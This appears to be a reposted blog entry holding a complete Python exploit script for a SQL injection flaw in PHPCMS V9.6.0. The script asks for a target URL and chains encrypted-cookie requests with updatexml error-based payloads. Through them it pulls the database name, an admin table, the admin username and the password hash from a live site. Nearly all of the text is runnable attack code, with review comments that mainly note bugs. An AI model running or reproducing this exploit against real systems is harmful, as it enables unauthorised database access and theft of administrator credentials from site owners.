• PHPCMS V9.6.0 SQL注入漏洞EXP


    运行于 Python 3.5

    import requests
    import time
    import re
    import sys
    
    def banner() -> None:
    	"""Print the single title line shown when the script starts."""
    	print("--------------EXP IS PHPCMS V9.6.0---------------")
    def get_encrypt_value(payload: str, url: str) -> list:
    	"""Send ``payload`` with the site cookies and decode the cookie the server answers with.

    	``url`` is the target base and ``payload`` the path+query appended to it.
    	The WAP index (``m=wap&a=index&siteid=1``) is requested first to obtain the
    	response cookies; the value of the ``<prefix>_siteid`` cookie is then also
    	stored under ``<prefix>_userid`` (prefix = first six characters of the cookie
    	name).  ``url + payload`` is fetched with those cookies and the value of the
    	``<prefix>_att_json`` response cookie is handed to get_data(), whose result
    	(a list of regex matches) is returned unchanged.

    	NOTE(review): ``encrypt_data`` is assigned only when an ``_att_json`` cookie is
    	present, so a response without one raises NameError on the last line; callers
    	in this file swallow that with a bare ``except:``.  Neither request sets a
    	timeout, so an unresponsive host blocks the script indefinitely.
    	"""
    	url_com = url + payload
    	url_1 = "{}/index.php?m=wap&a=index&siteid=1".format(url)
    	cookies = requests.get(url_1).cookies
    	for c in cookies:
    		if c.name[-7:]=='_siteid':
    			# mirror the site id into a <prefix>_userid cookie carrying the same value
    			cookie_head=c.name[:6]
    			cookies[cookie_head + '_userid']=c.value
    			cookies[c.name]=c.value
    			break
    	encrypt_cookie = requests.get(url_com,cookies=cookies).cookies
    	for c in encrypt_cookie:
    		if c.name[-9:] == '_att_json':
    			encrypt_data = c.value  # left unbound when no such cookie is set -> NameError below
    			break
    	return get_data(url,encrypt_data)
    def get_data(url, data):
    	"""Fetch ``{url}/index.php?m=content&c=down&a_k={data}`` and extract values from the error text.

    	Returns every capture group matched by ``XPATH syntax error: '~(.*?)~' <br />``
    	in the response body.  Extraction therefore depends entirely on the raw
    	database error being reflected into the page: if the response does not
    	contain that text the list is empty, which is why suppressing database error
    	output in the application removes this extraction path.
    	"""
    	target = "{}/index.php?m=content&c=down&a_k={}".format(url, data)
    	body = requests.get(target).text
    	pattern = r"XPATH syntax error: '~(.*?)~' <br />"
    	return re.findall(pattern, body)
    def get_payload(url: str) -> None:
    	"""Run the five chained requests against ``url`` and print what comes back.

    	Each step feeds the next: the table-name request interpolates ``db_name``
    	and the username/password requests interpolate ``table_name``.  Results are
    	appended to ``data`` in the order output_data() expects: database, table,
    	username, password.  The password is assembled from two separate requests
    	(``pass_s16`` and ``pass_x16``) and appended once.

    	Every step is wrapped in a bare ``except:``, so network errors, an empty
    	match list (``[0]`` on ``[]``) and a NameError from an unbound earlier result
    	all collapse into the placeholder ``"***"`` -- the printed report cannot
    	distinguish "nothing found" from "script failure".  The ``pass_s16`` step has
    	no placeholder branch: a failure there leaves the name unbound and surfaces
    	only as ``"***"`` for the password in the final step.
    	"""
    	data = []
    	try:
    		payload_db_name = {"db_name":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20database%28%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		db_name = get_encrypt_value(payload_db_name.get('db_name'),url)
    		db_name = db_name[0]
    		data.append(db_name)
    	except:
    		str = "***"  # NOTE(review): shadows the builtin ``str`` for the rest of this function
    		data.append(str)
    	try:
    		payload_table_name = {"table_name":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20table_name%*20from%*20information_schema.tables%*20where%*20table_schema%3D%*27"+db_name+"%*27%*20limit%*200%2C1%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		table_name = get_encrypt_value(payload_table_name.get('table_name'),url)
    		table_name = table_name[0]
    		data.append(table_name)
    	except:
    		str = "***"
    		data.append(str)
    	try:
    		payload_admin_name = {"admin_name":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20mid%28%28SELECT%*20username%*20from%*20"+table_name+"%*20limit%*200%2C1%29%2C1%2C16%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		admin_name = get_encrypt_value(payload_admin_name.get('admin_name'),url)
    		admin_name = admin_name[0]
    		data.append(admin_name)
    	except:
    		str = "***"
    		data.append(str)
    	try:
    		payload_pass_s16 = {"pass_s16":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20mid%28%28SELECT%*20password%*20from%*20"+table_name+"%*20limit%*200%2C1%29%2C1%2C16%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		pass_s16 = get_encrypt_value(payload_pass_s16.get('pass_s16'),url)
    		pass_s16 = pass_s16[0]
    	except:
    		# nothing is appended here; ``pass_s16`` stays unbound and the next step reports "***"
    		pass
    	try:
    		payload_pass_x16 = {"pass_x16":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20mid%28%28SELECT%*20password%*20from%*20"+table_name+"%*20limit%*200%2C1%29%2C16%2C20%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
    		pass_x16 = get_encrypt_value(payload_pass_x16.get('pass_x16'),url)
    		pass_x16 = pass_x16[0]
    		password = pass_s16 + pass_x16
    		data.append(password)
    	except:
    		str = "***"
    		data.append(str)
    	output_data(data)
    def output_data(data):
    	"""Print the collected values as a fixed four-line report.

    	``data`` is read positionally: [0] database, [1] table, [2] username,
    	[3] password.  Fewer than four entries raises IndexError.
    	"""
    	report = '''
    		database name is : {0}
    		table name is : {1}
    		admin username is : {2}
    		admin password is : {3}
    	'''
    	db, table, user, password = data[0], data[1], data[2], data[3]
    	print(report.format(db, table, user, password))
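    def get_url() -> str:
    	"""Prompt for the target base URL until it starts with ``http://`` or ``https://``.

    	Returns the entered URL with surrounding whitespace stripped.  A rejected
    	entry prints a warning and re-prompts instead of falling through and
    	returning None, which previously made later string concatenation fail.
    	"""
    	while True:
    		url = input("Please input url:").strip()
    		# The previous check was ("http://" in url) or ("https://" is url): the
    		# second half is an identity comparison that is never true, so https
    		# targets were rejected.  startswith() with a tuple checks both schemes.
    		if url.startswith(("http://", "https://")):
    			return url
    		print("Warning: Please input http:// or https:// ! try again !")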
    def main() -> None:
    	"""Entry point: show the banner, ask for a target, run the checks, print the finish time."""
    	banner()
    	target = get_url()
    	print("[*] target:{}".format(target))
    	get_payload(target)
    	stamp = time.strftime("%X")
    	print("[*] shutting down at {0}".format(stamp))
    # Script entry guard: run only when executed directly, not when imported.
    if __name__ == '__main__':
    	main()
    

      

  • 原文地址:https://www.cnblogs.com/Spec/p/10844822.html